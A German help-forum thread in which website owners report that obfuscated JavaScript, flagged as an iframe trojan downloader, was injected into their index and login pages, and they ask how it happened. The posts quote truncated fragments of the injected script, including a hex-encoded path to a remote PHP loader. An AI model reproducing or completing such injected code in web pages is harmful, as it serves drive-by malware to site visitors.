Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Tronjaner auf meiner Internetseite (https://www.trojaner-board.de/76812-tronjaner-meiner-internetseite.html)

Tristan W 27.08.2009 07:28
Tronjaner auf meiner Internetseite
 
Hallo Leute,

anscheinend wurde meine Internetseite gehackt. Auf der Startseite erschien vom Virenprogramm die Meldung, es sei mit "Trojan-Downloader.JS.Iframe.bcw" infiziert.

Als ich die HTML Seite im FTP Programm geöffnet hatte war im <head> neuer Quellcode eingefügt, der wie folgt aussah
Code:
<script>function c241384d21q4a94f0743f8e7(q4a94f074400b8){
var q4a94f07440884=16;
return (eval('pa'+'rseInt')(q4a94f074400b8,q4a94f07440884));} .... etc.
Kann mir jemand erklären, wie der Code in meine Internetseite gekommen ist? Wir haben seit einiger Zeit Werbung auf der Seite, die über ein IFrame eingeblendet wird. Da es anscheinend ein Iframe Trojaner ist, kann es sein, dass der Werbeprovider gehackt wurde? Aber wie landet das dann immer noch in der Datei der Internetseite?

Fragen über Fragen... Ich danke euch!

Viele Grüße,
Tristan

Tristan W 27.08.2009 08:32
Also, wie ich gerade gesehen habe wurden immer nur die index.php/html und login.php/html Dateien infiziert. Das ganze ging laut FTP-Log gestern Morgen innerhalb von Sekundenabständen vor sich. Sieht so aus, als wäre da ein Keylogger am Werk gewesen, der das FTP Passwort abgegriffenhat, oder?

Viele Grüße,
Tristan

fatnmad 08.04.2010 08:59
Hallo!

Ich habe ein ähnliches Problem. Habe schon desöfteren den kompletten Webserver überarbeiten müssen... Finde aber den besagten "Trojaner" oder zumindest den Ursprung des Problems nicht.

Das Hier steht bei mir in jeder index.html (.php / .html etc.), in jeder home.html sowie in Dateien mit dem "default" im Namen (bspw: default-embeds.php etc.):
Code:
<script>var GW;if(GW!='d'){GW='d'};function w(){var J='';var Q;if(Q!='T' && Q!='R'){Q='T'};var
F=new Array();var V=new String();var K=window;var z=unescape;var n=z("%2f%65%62%61%79%2d%63%6f%2d%75%6b%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6c%2e%70%68%70");var rh;if(rh!='' && rh!='uR'){rh='CH'};function _(X,XX)[ ... ]</script>
<!--6ea7a431d669fd4a5cd3a99b0545bab3-->
Vielleicht weiß hier einer eine Möglichkeit :(


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:32 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129